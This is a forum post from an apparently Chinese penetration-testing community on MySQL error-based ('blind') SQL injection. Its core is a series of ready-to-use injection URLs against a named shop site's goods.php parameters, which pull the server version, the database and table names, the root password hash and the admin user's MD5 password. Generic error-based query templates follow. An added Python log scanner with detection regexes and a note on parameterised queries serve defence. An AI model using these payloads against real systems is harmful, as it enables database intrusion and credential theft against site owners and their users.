China Network Penetration Testing Alliance
Title: Blind injection in detail
Author: admin
Time: 2012-9-5 14:59
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Table names of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
user_name column of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
password column of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Get the admin password (MD5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
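Every payload in this post relies on the same MySQL duplicate-entry trick (count(*) with concat(..., floor(rand()*2)) grouped by the concatenated value), so it leaves a recognisable trail in web server access logs. The following Python scanner is an added example, not code from the original post: it URL-decodes the request path of each log line and reports which parts of that signature fire. The log lines, client IPs and timestamps are constructed; the request strings are the payloads quoted above.

```python
import re
from urllib.parse import unquote

# Signatures of the floor(rand()*2) ... group by error-based technique used above,
# applied to the URL-decoded request path.
SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"count\(\*\).*?concat\(.*?floor\(rand\(0?\)\s*\*\s*2\).*?group\s+by", re.I | re.S),
    "information_schema": re.compile(r"information_schema\.(tables|columns|schemata)", re.I),
    "mysql_user": re.compile(r"from\s+mysql\.user", re.I),
    "char_obfuscation": re.compile(r"char\((\d{1,3}\s*,\s*)+\d{1,3}\)", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)\s*$"),
}

# Request field of an Apache/nginx combined-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def normalize(path):
    """URL-decode repeatedly (payloads may be double-encoded) and squash whitespace."""
    prev, cur = None, path
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return re.sub(r"\s+", " ", cur)


def classify(line):
    """Return the names of the signatures that fire on one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = normalize(m.group("path"))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Return (line_number, hits) for every line matching at least one signature."""
    return [(i, hits) for i, line in enumerate(lines, 1) if (hits := classify(line))]


# Constructed sample log: one benign request, then two payloads from the post.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [05/Sep/2012:14:59:07 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20'
    '(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 912',
    '10.0.0.9 - - [05/Sep/2012:14:59:12 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20'
    'TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20'
    '(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 912',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Log matching is a backstop only; the root cause is that `id` and `wsid` are concatenated into the SQL string, and binding them as query parameters removes the injection entirely.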
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)